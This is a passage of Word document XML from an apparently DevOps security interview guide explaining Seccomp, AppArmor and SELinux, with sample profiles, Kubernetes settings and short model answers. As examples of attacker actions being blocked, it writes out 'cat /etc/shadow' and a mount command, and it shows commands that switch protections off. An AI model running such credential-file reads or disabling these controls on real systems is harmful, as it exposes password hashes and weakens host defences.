        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose a web application only needs:</w:t>
        <w:br/>
        <w:t>read()</w:t>
        <w:br/>
        <w:t>write()</w:t>
        <w:br/>
        <w:t>open()</w:t>
        <w:br/>
        <w:t>close()</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If an attacker gains access and tries:</w:t>
        <w:br/>
        <w:t>mount /dev/sda1 /mnt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>the underlying mount() syscall can be blocked by Seccomp.</w:t>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>Operation not permitted</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Seccomp Works</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. A Seccomp profile is applied to a process or container.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. The profile defines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Allowed syscalls</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Denied syscalls</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. The Linux kernel enforces these rules.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "defaultAction": "SCMP_ACT_ERRNO",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "syscalls": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "names": ["read", "write", "open"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "action": "SCMP_ACT_ALLOW"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Meaning:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Allow read, write, open</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deny everything else</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Seccomp in Docker</w:t>
        <w:br/>
        <w:t>Docker applies a default Seccomp profile that blocks many risky syscalls.</w:t>
        <w:br/>
        <w:t>Run a container with the default profile:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Disable Seccomp (not recommended):</w:t>
        <w:br/>
        <w:t>docker run --security-opt seccomp=unconfined nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use a custom profile:</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --security-opt seccomp=profile.json \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Seccomp in Kubernetes</w:t>
        <w:br/>
        <w:t>Apply a Seccomp profile in a Pod:</w:t>
        <w:br/>
        <w:t>securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  seccompProfile:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    type: RuntimeDefault</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Options:</w:t>
        <w:br/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RuntimeDefault</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use container runtime's default profile</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Localhost</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Custom profile from node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unconfined</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Disable Seccomp</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      seccompProfile:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        type: RuntimeDefault</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits of Seccomp</w:t>
        <w:br/>
        <w:t>✅ Reduces attack surface</w:t>
        <w:br/>
        <w:t>✅ Prevents dangerous kernel interactions</w:t>
        <w:br/>
        <w:t>✅ Limits damage after container compromise</w:t>
        <w:br/>
        <w:t>✅ Improves container security</w:t>
        <w:br/>
        <w:t>✅ Supports least-privilege principle</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Seccomp vs AppArmor vs SELinux</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Seccomp</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AppArmor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SELinux</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controls syscalls</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controls file access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controls process capabilities</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Partial</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kernel-level enforcement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>Seccomp (Secure Computing Mode) is a Linux kernel security feature that restricts the system calls a process or container can make. It reduces the attack surface by allowing only approved syscalls and blocking potentially dangerous ones such as mount, ptrace, or other privileged operations. In Docker and Kubernetes, Seccomp profiles are commonly used to harden containers and prevent attackers from exploiting kernel functionality if a container is compromised. It is an important runtime security control and is often used alongside AppArmor, SELinux, and Kubernetes security policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q390. Explain AppArmor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is AppArmor?</w:t>
        <w:br/>
        <w:t>AppArmor (Application Armor) is a Linux Security Module (LSM) that provides Mandatory Access Control (MAC) by restricting what files, network resources, capabilities, and system operations an application can access.</w:t>
        <w:br/>
        <w:t>Think of it as a security policy that says:</w:t>
        <w:br/>
        <w:t>"Even if this application is compromised, it can only access the resources explicitly allowed to it."</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why AppArmor?</w:t>
        <w:br/>
        <w:t>By default, Linux uses Discretionary Access Control (DAC):</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * If a process runs as a user, it inherits that user's permissions.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * If an attacker compromises the process, they get those permissions too.</w:t>
        <w:br/>
        <w:t>AppArmor adds another layer:</w:t>
        <w:br/>
        <w:t>User Permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">       +</w:t>
        <w:br/>
        <w:t>AppArmor Policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">       =</w:t>
        <w:br/>
        <w:t>Effective Access</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The application can do only what both allow.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose an Nginx process is compromised.</w:t>
        <w:br/>
        <w:t>Without AppArmor:</w:t>
        <w:br/>
        <w:t>cat /etc/shadow</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If permissions allow, the attacker may access sensitive files.</w:t>
        <w:br/>
        <w:t>With AppArmor:</w:t>
        <w:br/>
        <w:t>DENIED: read access to /etc/shadow</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Even if the process is running as root, AppArmor can block access.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Can AppArmor Restrict?</w:t>
        <w:br/>
        <w:t>1. File Access</w:t>
        <w:br/>
        <w:t>Allow:</w:t>
        <w:br/>
        <w:t>/var/www/html/** r,</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Read-only access to web files.</w:t>
        <w:br/>
        <w:t>Block:</w:t>
        <w:br/>
        <w:t>/etc/shadow</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Network Access</w:t>
        <w:br/>
        <w:t>Allow:</w:t>
        <w:br/>
        <w:t>network inet tcp,</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Deny other network operations.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Linux Capabilities</w:t>
        <w:br/>
        <w:t>Allow:</w:t>
        <w:br/>
        <w:t>capability net_bind_service,</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Permit binding to ports below 1024.</w:t>
        <w:br/>
        <w:t>Deny:</w:t>
        <w:br/>
        <w:t>capability sys_admin,</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Process Execution</w:t>
        <w:br/>
        <w:t>Control which binaries can be executed.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>/usr/bin/python3 ix,</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AppArmor Modes</w:t>
        <w:br/>
        <w:t>Enforce Mode</w:t>
        <w:br/>
        <w:t>Rules are actively enforced.</w:t>
        <w:br/>
        <w:t>ACCESS DENIED</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Complain Mode</w:t>
        <w:br/>
        <w:t>Violations are logged but not blocked.</w:t>
        <w:br/>
        <w:t>Useful for testing policies.</w:t>
        <w:br/>
        <w:t>ACCESS ALLOWED (logged)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example AppArmor Profile</w:t>
        <w:br/>
        <w:t>profile my-web-app {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /var/www/** r,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /var/log/nginx/** rw,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  deny /etc/shadow r,</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Meaning:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Read website files</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Read/write logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Never access /etc/shadow</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AppArmor in Kubernetes</w:t>
        <w:br/>
        <w:t>Apply an AppArmor profile to a Pod:</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  annotations:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    container.apparmor.security.beta.kubernetes.io/app: runtime/default</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Or newer Kubernetes versions:</w:t>
        <w:br/>
        <w:t>securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  appArmorProfile:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    type: RuntimeDefault</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common options:</w:t>
        <w:br/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RuntimeDefault</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default AppArmor profile</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Localhost</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Custom profile on node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unconfined</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No AppArmor protection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AppArmor vs Seccomp</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AppArmor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Seccomp</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controls file access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controls network access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controls capabilities</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Partial</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controls syscalls</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mandatory Access Control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * AppArmor: "Don't read /etc/shadow."</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Seccomp: "Don't call mount()."</w:t>
        <w:br/>
        <w:t>They complement each other.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AppArmor vs SELinux</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AppArmor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SELinux</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Policy style</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Path-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Label-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Learning curve</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Common on Ubuntu</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less common</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Common on RHEL/CentOS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less common</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Kubernetes Security</w:t>
        <w:br/>
        <w:t>A production Kubernetes cluster often uses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Seccomp → restrict syscalls</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * AppArmor → restrict files, network, capabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RBAC → restrict Kubernetes API access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network Policies → restrict pod communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Falco → runtime threat detection</w:t>
        <w:br/>
        <w:t>This creates multiple layers of defense.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>AppArmor is a Linux Security Module that provides Mandatory Access Control by restricting what resources an application can access, including files, network operations, process execution, and Linux capabilities. It uses security profiles to define allowed and denied actions. In containerized environments such as Kubernetes, AppArmor helps limit the impact of a compromised container by preventing unauthorized access to sensitive files or privileged operations. It complements Seccomp, which restricts system calls, and together they provide strong runtime security for Linux workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q391. What is SELinux?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is SELinux?</w:t>
        <w:br/>
        <w:t>SELinux (Security-Enhanced Linux) is a Linux security framework that provides Mandatory Access Control (MAC) to enforce strict security policies on processes, files, ports, and users.</w:t>
        <w:br/>
        <w:t>It was originally developed by the National Security Agency and is now integrated into many Linux distributions such as Red Hat Enterprise Linux, CentOS, and Fedora.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why SELinux?</w:t>
        <w:br/>
        <w:t>Normally Linux uses permissions like:</w:t>
        <w:br/>
        <w:t>rwxr-xr-x</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If a process runs as root, it may access many resources.</w:t>
        <w:br/>
        <w:t>SELinux adds an extra security layer:</w:t>
        <w:br/>
        <w:t>User Permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">       +</w:t>
        <w:br/>
        <w:t>SELinux Policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">       =</w:t>
        <w:br/>
        <w:t>Actual Access</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Even if a user or process has Linux permissions, SELinux can still deny access.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How SELinux Works</w:t>
        <w:br/>
        <w:t>SELinux is label-based.</w:t>
        <w:br/>
        <w:t>Every object gets a security label:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Files</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Directories</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Processes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Ports</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Devices</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>ls -Z</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>system_u:object_r:httpd_sys_content_t:s0 index.html</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Components:</w:t>
        <w:br/>
        <w:t>Part</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>system_u</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SELinux user</w:t>
        <w:br/>
        <w:tab/>
        <w:t>object_r</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>httpd_sys_content_t</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>s0</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>The type is the most important part.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose Apache/Nginx runs with type:</w:t>
        <w:br/>
        <w:t>httpd_t</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Website files:</w:t>
        <w:br/>
        <w:t>httpd_sys_content_t</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux policy:</w:t>
        <w:br/>
        <w:t>httpd_t can read httpd_sys_content_t</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>But not:</w:t>
        <w:br/>
        <w:t>shadow_t</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If an attacker compromises the web server and tries:</w:t>
        <w:br/>
        <w:t>cat /etc/shadow</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux denies access even if file permissions seem sufficient.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux Modes</w:t>
        <w:br/>
        <w:t>1. Enforcing</w:t>
        <w:br/>
        <w:t>Policies are enforced.</w:t>
        <w:br/>
        <w:t>Access denied</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>getenforce</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Enforcing</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Permissive</w:t>
        <w:br/>
        <w:t>Violations are logged but not blocked.</w:t>
        <w:br/>
        <w:t>Access allowed but logged</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Useful for troubleshooting.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Disabled</w:t>
        <w:br/>
        <w:t>SELinux is turned off.</w:t>
        <w:br/>
        <w:t>Disabled</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Not recommended in production.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important SELinux Commands</w:t>
        <w:br/>
        <w:t>Check status</w:t>
        <w:br/>
        <w:t>sestatus</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check mode</w:t>
        <w:br/>
        <w:t>getenforce</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Temporary permissive mode</w:t>
        <w:br/>
        <w:t>setenforce 0</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Back to enforcing</w:t>
        <w:br/>
        <w:t>setenforce 1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>View labels</w:t>
        <w:br/>
        <w:t>ls -Z</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux Context Example</w:t>
        <w:br/>
        <w:t>ls -Z /var/www/html</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>-rw-r--r-- root root system_u:object_r:httpd_sys_content_t:s0 index.html</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The label determines access.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux in Containers &amp; Kubernetes</w:t>
        <w:br/>
        <w:t>SELinux can isolate containers by assigning unique labels.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  seLinuxOptions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    level: "s0:c123,c456"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prevents container-to-container access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Limits container escape impact</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Strengthens Kubernetes security</w:t>
        <w:br/>
        <w:t>Commonly used in:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OpenShift</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RHEL-based Kubernetes clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux vs AppArmor</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SELinux</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AppArmor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Policy model</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Label-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Path-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security strength</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Common on RHEL</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Common on Ubuntu</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Granularity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very fine-grained</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simpler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>AppArmor</w:t>
        <w:br/>
        <w:t>Allow:</w:t>
        <w:br/>
        <w:t>/var/www/*</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux</w:t>
        <w:br/>
        <w:t>Allow:</w:t>
        <w:br/>
        <w:t>httpd_t -&gt; httpd_sys_content_t</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SELinux vs Seccomp</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SELinux</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Seccomp</w:t>
        <w:br/>
        <w:tab/>
        <w:t>File access control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Process isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network restrictions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>System call filtering</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Mandatory Access Control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Kubernetes Security Stack</w:t>
        <w:br/>
        <w:t>A secure Kubernetes platform typically uses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. SELinux/AppArmor → resource access control</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Seccomp → syscall filtering</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. RBAC → API permissions</w:t>
        <w:br/>
